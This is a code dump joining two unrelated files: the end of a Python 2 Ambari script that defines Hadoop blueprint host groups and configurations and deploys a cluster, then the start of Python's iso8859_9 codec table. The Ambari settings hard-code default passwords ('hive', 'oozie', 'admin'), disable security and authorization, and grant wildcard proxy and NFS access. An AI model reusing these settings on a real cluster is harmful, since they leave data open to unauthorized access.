},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_4",
"components" : [
{
"name" : "APP_TIMELINE_SERVER"
},
{
"name" : "HIVE_SERVER"
},
{
"name" : "MYSQL_SERVER"
},
{
"name" : "SPARK_JOBHISTORYSERVER"
},
{
"name" : "STORM_UI_SERVER"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "workers",
"components" : [
{
"name" : "DATANODE"
},
{
"name" : "HBASE_REGIONSERVER"
},
{
"name" : "NODEMANAGER"
},
{
"name" : "SUPERVISOR"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "99"
}
]
large_host_groups = [
{
"name" : "master_1",
"components" : [
{
"name" : "AMBARI_SERVER"
},
{
"name" : "KAFKA_BROKER"
},
{
"name" : "METRICS_COLLECTOR"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_2",
"components" : [
{
"name" : "METRICS_COLLECTOR"
},
{
"name" : "NAMENODE"
},
{
"name" : "NIMBUS"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_3",
"components" : [
{
"name" : "DRPC_SERVER"
},
{
"name" : "FALCON_SERVER"
},
{
"name" : "HBASE_MASTER"
},
{
"name" : "HISTORYSERVER"
},
{
"name" : "HIVE_METASTORE"
},
{
"name" : "KAFKA_BROKER"
},
{
"name" : "OOZIE_SERVER"
},
{
"name" : "RESOURCEMANAGER"
},
{
"name" : "SECONDARY_NAMENODE"
},
{
"name" : "WEBHCAT_SERVER"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_4",
"components" : [
{
"name" : "HIVE_METASTORE"
},
{
"name" : "MYSQL_SERVER"
},
{
"name" : "SECONDARY_NAMENODE"
},
{
"name" : "SPARK_JOBHISTORYSERVER"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_5",
"components" : [
{
"name" : "NODEMANAGER"
},
{
"name" : "OOZIE_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_6",
"components" : [
{
"name" : "RESOURCEMANAGER"
},
{
"name" : "WEBHCAT_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_7",
"components" : [
{
"name" : "HBASE_MASTER"
},
{
"name" : "HISTORYSERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_8",
"components" : [
{
"name" : "APP_TIMELINE_SERVER"
},
{
"name" : "FALCON_SERVER"
},
{
"name" : "NIMBUS"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "workers",
"components" : [
{
"name" : "DATANODE"
},
{
"name" : "HBASE_REGIONSERVER"
},
{
"name" : "NODEMANAGER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "200"
}
]
if scenario_id == 'evaluation':
host_groups = evaluation_host_groups
elif scenario_id == 'small':
host_groups = small_host_groups
elif scenario_id == 'medium':
host_groups = medium_host_groups
elif scenario_id == 'large':
host_groups = large_host_groups
host_groups = evaluation_host_groups if scenario_id == 'evaluation' else small_host_groups
evaluation_configurations = [
{
"ams-hbase-env" : {
"properties" : {
"hbase_master_heapsize" : "512m",
"hbase_regionserver_heapsize" : "512m",
"hbase_regionserver_xmn_max" : "256m",
"hbase_regionserver_xmn_ratio" : "0.2"
}
}
},
{
"capacity-scheduler" : {
"yarn.scheduler.capacity.root.default.maximum-am-resource-percent" : "0.5",
"yarn.scheduler.capacity.maximum-am-resource-percent" : "0.5"
}
},
{
"cluster-env": {
"cluster_name": "sandbox",
"smokeuser": "ambari-qa",
"user_group": "hadoop",
"security_enabled": "false"
}
},
{
"core-site" : {
"hadoop.proxyuser.hue.hosts" : "*",
"hadoop.proxyuser.hue.groups" : "*",
"hadoop.proxyuser.root.hosts" : "*",
"hadoop.proxyuser.root.groups" : "*",
"hadoop.proxyuser.oozie.hosts" : "*",
"hadoop.proxyuser.oozie.groups" : "*",
"hadoop.proxyuser.hcat.hosts" : "*",
"hadoop.proxyuser.hcat.groups" : "*"
}
},
{
"hadoop-env": {
"dtnode_heapsize" : "250",
"hadoop_heapsize" : "250",
"namenode_heapsize" : "250",
"namenode_opt_newsize": "50",
"namenode_opt_maxnewsize": "100"
}
},
{
"hbase-site" : {
"hbase.security.authorization": "true",
"hbase.rpc.engine": "org.apache.hadoop.hbase.ipc.SecureRpcEngine",
"hbase_master_heapsize": "250",
"hbase_regionserver_heapsize": "250",
"hbase.rpc.protection": "PRIVACY"
}
},
{
"hdfs-site" : {
"dfs.block.size" : "34217472",
"dfs.replication" : "1",
"dfs.namenode.accesstime.precision" : "3600000",
"dfs.nfs3.dump.dir" : "/tmp/.hdfs-nfs",
"dfs.nfs.exports.allowed.hosts" : "* rw",
"dfs.datanode.max.xcievers" : "1024",
"dfs.block.access.token.enable" : "false",
"dfs.datanode.data.dir": "/disks/0/hadoop/hdfs/data,/disks/1/hadoop/hdfs/data,/disks/2/hadoop/hdfs/data,/disks/3/hadoop/hdfs/data,/disks/4/hadoop/hdfs/data,/disks/5/hadoop/hdfs/data,/disks/6/hadoop/hdfs/data,/disks/7/hadoop/hdfs/data,/disks/8/hadoop/hdfs/data,/disks/9/hadoop/hdfs/data,/disks/10/hadoop/hdfs/data,/disks/11/hadoop/hdfs/data,/disks/12/hadoop/hdfs/data,/disks/13/hadoop/hdfs/data,/disks/14/hadoop/hdfs/data,/disks/15/hadoop/hdfs/data",
"dfs.namenode.checkpoint.dir": "/disks/0/hadoop/hdfs/namesecondary",
"dfs.namenode.name.dir": "/disks/0/hadoop/hdfs/namenode,/disks/1/hadoop/hdfs/namenode,/disks/2/hadoop/hdfs/namenode,/disks/3/hadoop/hdfs/namenode,/disks/4/hadoop/hdfs/namenode,/disks/5/hadoop/hdfs/namenode,/disks/6/hadoop/hdfs/namenode,/disks/7/hadoop/hdfs/namenode",
"dfs.datanode.failed.volumes.tolerated": "6"
}
},
{
"global": {
"oozie_data_dir": "/disks/0/hadoop/oozie/data",
"zk_data_dir": "/disks/0/hadoop/zookeeper",
"falcon.embeddedmq.data": "/disks/0/hadoop/falcon/embeddedmq/data",
"falcon_local_dir": "/disks/0/hadoop/falcon",
"namenode_heapsize" : "16384m"
}
},
{
"hive-site" : {
"javax.jdo.option.ConnectionPassword" : "hive",
"hive.tez.container.size" : "250",
"hive.tez.java.opts" : "-server -Xmx200m -Djava.net.preferIPv4Stack=true",
"hive.heapsize" : "250",
"hive.users.in.admin.role" : "hue,hive",
"hive_metastore_user_passwd" : "hive",
"hive.server2.enable.impersonation": "true",
"hive.compactor.check.interval": "300s",
"hive.compactor.initiator.on": "true",
"hive.compactor.worker.timeout": "86400s",
"hive.enforce.bucketing": "true",
"hive.support.concurrency": "true",
"hive.exec.dynamic.partition.mode": "nonstrict",
"hive.server2.enable.doAs": "true",
"hive.txn.manager": "org.apache.hadoop.hive.ql.lockmgr.DbTxnManager",
"hive.txn.max.open.batch": "1000",
"hive.txn.timeout": "300",
"hive.security.authorization.enabled": "false",
"hive.users.in.admin.role": "hue,hive",
"hive.metastore.uris" : "thrift://%HOSTGROUP::master_2%:9083"
}
},
{
"mapred-env": {
"jobhistory_heapsize" : "250"
}
},
{
"mapred-site" : {
"mapreduce.map.memory.mb" : "250",
"mapreduce.reduce.memory.mb" : "250",
"mapreduce.task.io.sort.mb" : "64",
"yarn.app.mapreduce.am.resource.mb" : "250",
"yarn.app.mapreduce.am.command-opts" : "-Xmx200m",
"mapred.job.reduce.memory.mb" : "250",
"mapred.child.java.opts" : "-Xmx200m",
"mapred.job.map.memory.mb" : "250",
"io.sort.mb" : "64",
"mapreduce.map.java.opts" : "-Xmx200m",
"mapreduce.reduce.java.opts" : "-Xmx200m"
}
},
{
"oozie-site" : {
"oozie.service.ProxyUserService.proxyuser.hue.hosts" : "*",
"oozie.service.ProxyUserService.proxyuser.hue.groups" : "*",
"oozie.service.ProxyUserService.proxyuser.falcon.hosts": "*",
"oozie.service.ProxyUserService.proxyuser.falcon.groups": "*",
"oozie.service.JPAService.jdbc.password" : "oozie"
}
},
{
"storm-site" : {
"logviewer.port" : 8005,
"nimbus.childopts" : "-Xmx220m -javaagent:/usr/hdp/current/storm-client/contrib/storm-jmxetric/lib/jmxetric-1.0.4.jar=host=sandbox.hortonworks.com,port=8649,wireformat31x=true,mode=multicast,config=/usr/hdp/current/storm-client/contrib/storm-jmxetric/conf/jmxetric-conf.xml,process=Nimbus_JVM",
"ui.childopts" : "-Xmx220m",
"drpc.childopts" : "-Xmx220m"
}
},
{
"tez-site" : {
"tez.am.java.opts" : "-server -Xmx200m -Djava.net.preferIPv4Stack=true -XX:+UseNUMA -XX:+UseParallelGC",
"tez.am.resource.memory.mb" : "250",
"tez.dag.am.resource.memory.mb" : "250",
"yarn.app.mapreduce.am.command-opts" : "-Xmx200m"
}
},
{
"webhcat-site" : {
"webhcat.proxyuser.hue.hosts" : "*",
"webhcat.proxyuser.hue.groups" : "*",
"webhcat.proxyuser.hcat.hosts" : "*",
"webhcat.proxyuser.hcat.groups" : "*",
"templeton.hive.properties" : "hive.metastore.local=false,hive.metastore.uris=thrift://sandbox.hortonworks.com:9083,hive.metastore.sasl.enabled=false,hive.metastore.execute.setugi=true,hive.metastore.warehouse.dir=/apps/hive/warehouse"
}
},
{
"yarn-env": {
"apptimelineserver_heapsize" : "250",
"resourcemanager_heapsize" : "250",
"nodemanager_heapsize" : "250",
"yarn_heapsize" : "250"
}
},
{
"yarn-site" : {
"yarn.nodemanager.resource.memory-mb": "2250",
"yarn.nodemanager.vmem-pmem-ratio" : "10",
"yarn.scheduler.minimum-allocation-mb" : "250",
"yarn.scheduler.maximum-allocation-mb" : "2250",
"yarn.nodemanager.pmem-check-enabled" : "false",
"yarn.acl.enable" : "false",
"yarn.resourcemanager.webapp.proxyuser.hcat.groups" : "*",
"yarn.resourcemanager.webapp.proxyuser.hcat.hosts" : "*",
"yarn.resourcemanager.webapp.proxyuser.oozie.groups" : "*",
"yarn.resourcemanager.webapp.proxyuser.oozie.hosts" : "*"
}
}
]
standard_configurations = [
{
"ams-hbase-env" : {
"properties" : {
"hbase_master_heapsize" : "512m",
"hbase_regionserver_heapsize" : "512m",
"hbase_regionserver_xmn_max" : "256m",
"hbase_regionserver_xmn_ratio" : "0.2"
}
}
},
{
"capacity-scheduler" : {
"yarn.scheduler.capacity.root.default.maximum-am-resource-percent" : "0.5",
"yarn.scheduler.capacity.maximum-am-resource-percent" : "0.5"
}
},
{
"cluster-env": {
"cluster_name": "hdp",
"smokeuser": "ambari-qa",
"user_group": "hadoop",
"security_enabled": "false"
}
},
{
"core-site" : {
"hadoop.proxyuser.hue.hosts" : "*",
"hadoop.proxyuser.hue.groups" : "*",
"hadoop.proxyuser.root.hosts" : "*",
"hadoop.proxyuser.root.groups" : "*",
"hadoop.proxyuser.oozie.hosts" : "*",
"hadoop.proxyuser.oozie.groups" : "*",
"hadoop.proxyuser.hcat.hosts" : "*",
"hadoop.proxyuser.hcat.groups" : "*"
}
},
{
"hadoop-env": {
"dtnode_heapsize" : "250",
"hadoop_heapsize" : "250",
"namenode_heapsize" : "250",
"namenode_opt_newsize": "50",
"namenode_opt_maxnewsize": "100"
}
},
{
"yarn-site": {
"yarn.nodemanager.local-dirs": "/disks/0/hadoop/yarn/local,/disks/1/hadoop/yarn/local,/disks/2/hadoop/yarn/local,/disks/3/hadoop/yarn/local,/disks/4/hadoop/yarn/local,/disks/5/hadoop/yarn/local,/disks/6/hadoop/yarn/local,/disks/7/hadoop/yarn/local",
"yarn.nodemanager.log-dirs": "/disks/0/hadoop/yarn/log,/disks/1/hadoop/yarn/log,/disks/2/hadoop/yarn/log,/disks/3/hadoop/yarn/log,/disks/4/hadoop/yarn/log,/disks/5/hadoop/yarn/log,/disks/6/hadoop/yarn/log,/disks/7/hadoop/yarn/log,/disks/8/hadoop/yarn/log,/disks/9/hadoop/yarn/log,/disks/10/hadoop/yarn/log,/disks/11/hadoop/yarn/log,/disks/12/hadoop/yarn/log,/disks/13/hadoop/yarn/log,/disks/14/hadoop/yarn/log,/disks/15/hadoop/yarn/log",
"yarn.timeline-service.leveldb-timeline-store.path": "/disks/0/hadoop/yarn/timeline",
"yarn.nodemanager.resource.memory-mb" : "32768",
"yarn.scheduler.maximum-allocation-mb" : "32768",
"yarn.scheduler.minimum-allocation-mb" : "2048"
}
},
{
"tez-site": {
"tez.am.resource.memory.mb" : "2048",
"tez.am.java.opts" : "-server -Xmx1638m -Djava.net.preferIPv4Stack=true -XX:+UseNUMA -XX:+UseParallelGC"
}
},
{
"mapred-site": {
"mapreduce.map.java.opts" : "-Xmx1638m",
"mapreduce.map.memory.mb" : "2048",
"mapreduce.reduce.java.opts" : "-Xmx1638m",
"mapreduce.reduce.memory.mb" : "2048",
"mapreduce.task.io.sort.mb" : "819",
"yarn.app.mapreduce.am.command-opts" : "-Xmx1638m",
"yarn.app.mapreduce.am.resource.mb" : "2048"
}
},
{
"hdfs-site": {
"dfs.datanode.data.dir": "/disks/0/hadoop/hdfs/data,/disks/1/hadoop/hdfs/data,/disks/2/hadoop/hdfs/data,/disks/3/hadoop/hdfs/data,/disks/4/hadoop/hdfs/data,/disks/5/hadoop/hdfs/data,/disks/6/hadoop/hdfs/data,/disks/7/hadoop/hdfs/data,/disks/8/hadoop/hdfs/data,/disks/9/hadoop/hdfs/data,/disks/10/hadoop/hdfs/data,/disks/11/hadoop/hdfs/data,/disks/12/hadoop/hdfs/data,/disks/13/hadoop/hdfs/data,/disks/14/hadoop/hdfs/data,/disks/15/hadoop/hdfs/data",
"dfs.namenode.checkpoint.dir": "/disks/0/hadoop/hdfs/namesecondary",
"dfs.namenode.name.dir": "/disks/0/hadoop/hdfs/namenode,/disks/1/hadoop/hdfs/namenode,/disks/2/hadoop/hdfs/namenode,/disks/3/hadoop/hdfs/namenode,/disks/4/hadoop/hdfs/namenode,/disks/5/hadoop/hdfs/namenode,/disks/6/hadoop/hdfs/namenode,/disks/7/hadoop/hdfs/namenode",
"dfs.datanode.failed.volumes.tolerated": "6",
"dfs.nfs3.dump.dir" : "/tmp/.hdfs-nfs"
}
},
{
"global": {
"oozie_data_dir": "/disks/0/hadoop/oozie/data",
"zk_data_dir": "/disks/0/hadoop/zookeeper",
"falcon.embeddedmq.data": "/disks/0/hadoop/falcon/embeddedmq/data",
"falcon_local_dir": "/disks/0/hadoop/falcon",
"namenode_heapsize" : "16384m"
}
},
{
"hbase-site" : {
"hbase.security.authorization": "true",
"hbase.rpc.engine": "org.apache.hadoop.hbase.ipc.SecureRpcEngine",
"hbase_master_heapsize": "250",
"hbase_regionserver_heapsize": "250",
"hbase.rpc.protection": "PRIVACY",
"hbase.tmp.dir": "/disks/0/hadoop/hbase"
}
},
{
"storm-site": {
"storm.local.dir": "/disks/0/hadoop/storm"
}
},
{
"falcon-startup.properties": {
"*.config.store.uri": "file:///disks/0/hadoop/falcon/store"
}
},
{
"hive-site": {
"hive.auto.convert.join.noconditionaltask.size" : "716177408",
"hive.tez.container.size" : "2048",
"hive.tez.java.opts" : "-server -Xmx1638m -Djava.net.preferIPv4Stack=true -XX:NewRatio=8 -XX:+UseNUMA -XX:+UseParallelGC",
"hive.metastore.uris" : "thrift://%HOSTGROUP::master_3%:9083"
}
}
]
configurations = evaluation_configurations if scenario_id == 'evaluation' else standard_configurations
data = {
"configurations" : configurations,
"host_groups": host_groups,
"Blueprints" : {
"blueprint_name" : blueprint_name,
"stack_name" : "HDP",
"stack_version" : "2.2"
}
}
data = json.dumps(data)
request = urllib2.Request(url, data)
request.add_header('Authorization', get_ambari_auth_string())
request.add_header('X-Requested-By', 'ambari')
request.add_header('Content-Type', 'text/plain')
try:
response = urllib2.urlopen(request, timeout=request_timeout)
pprint.pprint(response.read())
except urllib2.HTTPError as e:
logger.error('Cluster deployment failed: ' + e.read())
raise e
return 'myblueprint'
def initiate_cluster_deploy(blueprint_name, cluster_id, num_masters, num_workers):
logger.info('Deploying cluster...')
url = '%s://localhost:%s/api/v1/clusters/%s' % (protocol, port, cluster_id)
if num_masters + num_workers < 4:
raise Exception('Cluster size must be 4 or greater')
data = {
"blueprint": blueprint_name,
"default_password": "admin",
"host_groups": [
]
}
for i in range(1, num_masters + 1):
data['host_groups'].append({
"name": "master_%d" % i,
"hosts": [{
"fqdn": get_fqdn(i)
}]
})
worker_hosts = []
for i in range(num_masters + 1, num_masters + num_workers + 1):
worker_hosts.append({
"fqdn": get_fqdn(i)
})
data['host_groups'].append({
"name": "workers",
"hosts": worker_hosts
})
data = json.dumps(data)
pprint.pprint('data=' + data)
request = urllib2.Request(url, data)
request.add_header('Authorization', get_ambari_auth_string())
request.add_header('X-Requested-By', 'ambari')
request.add_header('Content-Type', 'text/plain')
try:
response = urllib2.urlopen(request, timeout=120)
pprint.pprint(response.read())
except urllib2.HTTPError as e:
logger.error('Cluster deployment failed: ' + e.read())
raise e
def poll_until_cluster_deployed(cluster_id, timeout):
url = '%s://localhost:%s/api/v1/clusters/%s/requests/1?fields=Requests/progress_percent,Requests/request_status' % (protocol, port, cluster_id)
deploy_success = False
deploy_finished = False
start_time = time.time()
logger.info('poll until function')
while time.time() - start_time < timeout:
request = urllib2.Request(url)
request.add_header("Authorization", get_ambari_auth_string())
try:
result = urllib2.urlopen(request, timeout=request_timeout).read()
pprint.pprint(result)
if (result is not None):
jsonResult = json.loads(result)
if jsonResult['Requests']['request_status'] == 'COMPLETED':
deploy_success = True
if int(jsonResult['Requests']['progress_percent']) == 100 or jsonResult['Requests']['request_status'] == 'FAILED':
deploy_finished = True
break
except:
logger.info('Could not poll deploy status from the server.')
time.sleep(5)
if not deploy_finished:
raise TimeoutException('Timed out while waiting for cluster deployment to finish')
elif not deploy_success:
raise Exception('Cluster deploy failed')
if action == 'bootstrap':
masters_iplist = masters_iplist.split(',')
workers_iplist = workers_iplist.split(',')
ambari_server_hostname = get_hostname(1)
all_hostnames = map((lambda i: get_hostname(i)), range(1, num_masters + num_workers + 1))
logger.info(all_hostnames)
host_ip_map = get_host_ip_map(all_hostnames)
update_etc_hosts(host_ip_map)
update_ambari_agent_ini(ambari_server_hostname)
patch_ambari_agent()
run_system_command('chkconfig ambari-agent on')
logger.info('Starting ambari-agent...')
run_system_command('ambari-agent start')
logger.info('ambari-agent started')
if is_ambari_server_host():
run_system_command('chkconfig ambari-server on')
logger.info('Running ambari-server setup...')
run_system_command('ambari-server setup -s -j /usr/jdk64/jdk1.7.0_45')
logger.info('ambari-server setup finished')
if protocol == 'https':
logger.info('Enabling HTTPS...')
enable_https()
logger.info('HTTPS enabled')
logger.info('Starting ambari-server...')
run_system_command('ambari-server start')
logger.info('ambari-server started')
try:
set_admin_password(admin_password, 60 * 2)
# set current_admin_password so that HTTP requests to Ambari start using the new user-specified password
current_admin_password = admin_password
poll_until_all_agents_registered(num_masters + num_workers, 60 * 4)
blueprint_name = create_blueprint(scenario_id)
initiate_cluster_deploy(blueprint_name, cluster_id, num_masters, num_workers)
except:
logger.error('Failed VM Bootstrap')
sys.exit(1)
else:
try:
current_admin_password = admin_password
poll_until_cluster_deployed(cluster_id, check_timeout_seconds)
except TimeoutException as e:
logger.info(e)
if report_timeout_fail:
logger.error('Failed cluster deployment')
sys.exit(1)
else:
logger.info('Cluster deployment has not completed')
sys.exit(0)
except:
logger.error('Failed cluster deployment')
sys.exit(1)
logger.info('Finished VM Bootstrap successfully')
sys.exit(0)
| mit |
dpiers/coderang-meteor | public/jsrepl/extern/python/unclosured/lib/python2.7/encodings/iso8859_9.py | 593 | 13412 | """ Python Character Mapping Codec iso8859_9 generated from 'MAPPINGS/ISO8859/8859-9.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='iso8859-9',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> NULL
u'\x01' # 0x01 -> START OF HEADING
u'\x02' # 0x02 -> START OF TEXT
u'\x03' # 0x03 -> END OF TEXT
u'\x04' # 0x04 -> END OF TRANSMISSION
u'\x05' # 0x05 -> ENQUIRY
u'\x06' # 0x06 -> ACKNOWLEDGE
u'\x07' # 0x07 -> BELL
u'\x08' # 0x08 -> BACKSPACE
u'\t' # 0x09 -> HORIZONTAL TABULATION
u'\n' # 0x0A -> LINE FEED
u'\x0b' # 0x0B -> VERTICAL TABULATION
u'\x0c' # 0x0C -> FORM FEED
u'\r' # 0x0D -> CARRIAGE RETURN
u'\x0e' # 0x0E -> SHIFT OUT
u'\x0f' # 0x0F -> SHIFT IN
u'\x10' # 0x10 -> DATA LINK ESCAPE
u'\x11' # 0x11 -> DEVICE CONTROL ONE
u'\x12' # 0x12 -> DEVICE CONTROL TWO
u'\x13' # 0x13 -> DEVICE CONTROL THREE
u'\x14' # 0x14 -> DEVICE CONTROL FOUR
u'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x16 -> SYNCHRONOUS IDLE
u'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x18 -> CANCEL
u'\x19' # 0x19 -> END OF MEDIUM
u'\x1a' # 0x1A -> SUBSTITUTE
u'\x1b' # 0x1B -> ESCAPE
u'\x1c' # 0x1C -> FILE SEPARATOR
u'\x1d' # 0x1D -> GROUP SEPARATOR
u'\x1e' # 0x1E -> RECORD SEPARATOR
u'\x1f' # 0x1F -> UNIT SEPARATOR
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
